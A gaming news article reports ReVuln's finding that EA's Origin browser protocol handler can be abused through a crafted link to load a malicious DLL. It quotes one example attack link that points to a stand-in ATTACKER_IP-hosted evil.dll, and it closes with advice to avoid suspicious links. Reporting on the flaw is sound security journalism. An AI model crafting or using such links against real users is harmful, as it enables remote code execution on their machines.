Origin browser protocol exploit shown to execute malicious software with a single click

Origin

A security flaw has surfaced in the browser protocol Origin uses to launch games through custom links using the "origin:" structure. As Ars Technica reports, research group ReVuln demonstrates how a malicious program can be executed via a modified Origin link masquerading as a game launch.

Normally, an Origin game calls for a "origin://LaunchGame/[GameID]" command when launching through a browser. According to ReVuln, attackers can simply modify this path to something like "origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll" to toxify the command, causing it to run a foreign DLL.

In addition to a paper on its findings, ReVuln also recorded a brief video of the exploit in action.

Responding to Ars, an EA rep said, "Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure."

The issue isn't exclusive to Origin—other programs using this kind of protocol are vulnerable, including Steam, which the same group demonstrated attacks on in October .

The problem is in the same family as any other phishing attack launched from malformed links or trojan email attachments. In the end, the safest course is to never click on un-vetted links containing funky-looking parameters, be it an Origin launch or otherwise. Or, in the words of Dr. Breen: "Be wise. Be safe. Be aware."

TOPICS
Omri Petitte

Omri Petitte is a former PC Gamer associate editor and long-time freelance writer covering news and reviews. If you spot his name, it probably means you're reading about some kind of first-person shooter. Why yes, he would like to talk to you about Battlefield. Do you have a few days?

Latest in Platforms
A screenshot from game Mudborne of a little humanoid frog in a marsh
Five new Steam games you probably missed (March 24, 2025)
midnight murder club
Five new Steam games you probably missed (March 17, 2025)
Screenshot of Children of Clay showing a mysterious clay model
Five new Steam games you probably missed (March 10, 2025)
discord
Brace yourself for Discord to get worse: Reports swirl that the company is in talks with bankers about opening itself up to shareholders
The Spy from Team Fortress 2 holds up a folder with an accusatory expression.
Steam users react ecstatically to update that lets them access their heaving game notes via the web, also it fixes Monster Hunter Wilds video recording
HasanAbi
Twitch streamer Hasan Piker suspended after saying Republicans would 'kill Rick Scott' if they really cared about Medicare fraud
Latest in News
Two brightly colored stormtroopers dressed like Run-DMC stand in front of PAX Australia's WELCOME HOME banner.
Tickets for PAX Australia 2025 are on sale now
An Enshrouded player in a recreation of Erebor from The Lord of the Rings
Kings under the Mountain! 33 Enshrouded players spent 10,000 hours to recreate this iconic location from The Lord of the Rings
A mech awakens.
Mecha Break developer is considering unlocking all mechs following open beta feedback
Lara Croft Unified Art
Tomb Raider developer Crystal Dynamics lays off 17 employees 'to better align our current business needs and the studio's future success'
A long bendy arm stealing money from people in a subway car
'You're a very long arm. You steal things. It's a comedy game,' explains developer of comedy game where you steal things with a very long arm
The heroes are attacked by monsters
Pillars of Eternity is getting turn-based combat to mark its 10th anniversary, and that means PC Gamer editors will soon be arguing about combat mechanics again